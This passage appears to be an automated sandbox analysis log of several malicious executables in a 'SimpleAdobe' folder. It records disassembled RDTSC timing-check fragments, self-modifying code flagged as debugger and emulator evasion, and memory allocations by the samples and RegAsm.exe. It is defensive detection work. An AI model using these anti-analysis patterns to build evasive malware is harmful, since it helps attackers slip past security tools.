Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51303A1 second address: 5130418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F7F7F0190D8h 0x0000000f pushad 0x00000010 movzx ecx, bx 0x00000013 jmp 00007F7F0D21AE19h 0x00000018 popad 0x00000019 test byte ptr [esi+48h], 00000001h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F7F0D21AE13h 0x00000026 xor cl, 0000003Eh 0x00000029 jmp 00007F7F0D21AE19h 0x0000002e popfd 0x0000002f mov esi, 61C31E87h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130418 second address: 513044D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C09Eh 0x00000007 call 00007F7F0D2259BFh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F7F7F023C25h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F0D2259C1h 0x0000001f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513044D second address: 5130462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130462 second address: 5130468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130468 second address: 513046C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513046C second address: 513047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 513047C second address: 5130483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51206FD second address: 5120710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120710 second address: 5120728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D21AE14h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120728 second address: 5120746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7F0D2259C3h 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120746 second address: 512078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 270Ah 0x00000007 mov dh, A9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F7F0D21AE0Ah 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7F0D21AE0Ah 0x0000001d add cx, 47F8h 0x00000022 jmp 00007F7F0D21AE0Bh 0x00000027 popfd 0x00000028 popad 0x00000029 and esp, FFFFFFF8h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov esi, ebx 0x00000031 mov dx, 8272h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 512078C second address: 51207BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F7F0D2259C4h 0x0000000b or ax, D188h 0x00000010 jmp 00007F7F0D2259BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51207BF second address: 51207F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, 4F7C7ECDh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 movsx ebx, ax 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7F0D21AE19h 0x0000001d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51207F0 second address: 51207F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51207F5 second address: 512080C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F0D21AE0Bh 0x00000011 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 512080C second address: 5120890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F0D2259C1h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7F0D2259BCh 0x00000017 and si, B638h 0x0000001c jmp 00007F7F0D2259BBh 0x00000021 popfd 0x00000022 jmp 00007F7F0D2259C8h 0x00000027 popad 0x00000028 mov esi, dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F7F0D2259C7h 0x00000032 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120890 second address: 51208B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51208B5 second address: 51208B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51208B9 second address: 51208D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51208D1 second address: 5120944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c jmp 00007F7F0D2259C4h 0x00000011 pushfd 0x00000012 jmp 00007F7F0D2259C2h 0x00000017 jmp 00007F7F0D2259C5h 0x0000001c popfd 0x0000001d popad 0x0000001e je 00007F7F7F02B423h 0x00000024 jmp 00007F7F0D2259BEh 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov esi, edx 0x00000035 push edx 0x00000036 pop esi 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120944 second address: 5120959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D21AE11h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120959 second address: 51209EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d pushad 0x0000000e push esi 0x0000000f pop eax 0x00000010 pushfd 0x00000011 jmp 00007F7F0D2259BFh 0x00000016 sbb ecx, 5219B64Eh 0x0000001c jmp 00007F7F0D2259C9h 0x00000021 popfd 0x00000022 popad 0x00000023 je 00007F7F7F02B3B3h 0x00000029 pushad 0x0000002a jmp 00007F7F0D2259BCh 0x0000002f mov di, si 0x00000032 popad 0x00000033 test byte ptr [76FB6968h], 00000002h 0x0000003a jmp 00007F7F0D2259BCh 0x0000003f jne 00007F7F7F02B39Ch 0x00000045 jmp 00007F7F0D2259C0h 0x0000004a mov edx, dword ptr [ebp+0Ch] 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 mov ax, bx 0x00000053 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51209EF second address: 5120A0C instructions: 0x00000000 rdtsc 0x00000002 mov bl, 23h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F7F0D21AE0Eh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120A0C second address: 5120A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120AC6 second address: 5120ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D21AE14h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120ADE second address: 5120B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F7F0D2259C7h 0x0000000e pop ebx 0x0000000f jmp 00007F7F0D2259C6h 0x00000014 mov esp, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120B1D second address: 5120B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120B21 second address: 5120B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120B27 second address: 5120B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5120B2D second address: 5120B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130E3A second address: 5130E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dh, 18h 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F0D21AE10h 0x00000016 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130E6F second address: 5130EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F0D2259C1h 0x00000008 mov eax, 4A7AE6F7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx ebx, si 0x00000017 call 00007F7F0D2259C0h 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130EA4 second address: 5130EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130EAA second address: 5130EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130EAE second address: 5130EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130EBE second address: 5130EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130EC4 second address: 5130F02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dl, 14h 0x0000000f pushfd 0x00000010 jmp 00007F7F0D21AE16h 0x00000015 xor esi, 78A008D8h 0x0000001b jmp 00007F7F0D21AE0Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130F02 second address: 5130F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130F08 second address: 5130F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130BAD second address: 5130C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, 7850h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007F7F0D2259C1h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F7F0D2259C1h 0x0000001b add eax, 6C32C386h 0x00000021 jmp 00007F7F0D2259C1h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007F7F0D2259BAh 0x00000034 or esi, 635F5628h 0x0000003a jmp 00007F7F0D2259BBh 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130C1C second address: 5130C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, si 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c jmp 00007F7F0D21AE10h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 5130C3F second address: 5130C45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51B0689 second address: 51B06A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51B06A4 second address: 51B06C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51B06C0 second address: 51B06D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D21AE0Eh 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51B06D2 second address: 51B0720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7F0D2259BDh 0x00000010 or ch, 00000046h 0x00000013 jmp 00007F7F0D2259C1h 0x00000018 popfd 0x00000019 mov di, cx 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7F0D2259C9h 0x00000026 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51B0720 second address: 51B0730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D21AE0Ch 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51B0730 second address: 51B0734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51A086A second address: 51A0883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F7F0D21AE13h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51A0883 second address: 51A08B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F0D2259C7h 0x00000011 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51A08B7 second address: 51A08C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 5B3A329Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51A07D7 second address: 51A07DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51A07DB second address: 51A07DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51A07DF second address: 51A07E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51A07E5 second address: 51A0820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F7F0D21AE10h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bx, B110h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51A0820 second address: 51A082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D2259BBh 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51402EA second address: 51402F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51402F0 second address: 51402F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51402F4 second address: 51402F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: 51402F8 second address: 514033D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7F0D2259C2h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F7F0D2259C0h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F7F0D2259C0h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Special instruction interceptor: First address: A2EBF1 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Special instruction interceptor: First address: BE066F instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Special instruction interceptor: First address: A2EB1A instructions caused by: Self-modifying code

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory allocated: C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory allocated: 2680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory allocated: C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory allocated: 27C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory allocated: 47C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory allocated: 2A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory allocated: 4A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Memory allocated: 1B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Memory allocated: 3560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Memory allocated: 5560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Memory allocated: 6280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Memory allocated: 7280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Memory allocated: B90000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Memory allocated: 2450000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1480000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2D60000 memory reserve \| memory write watch
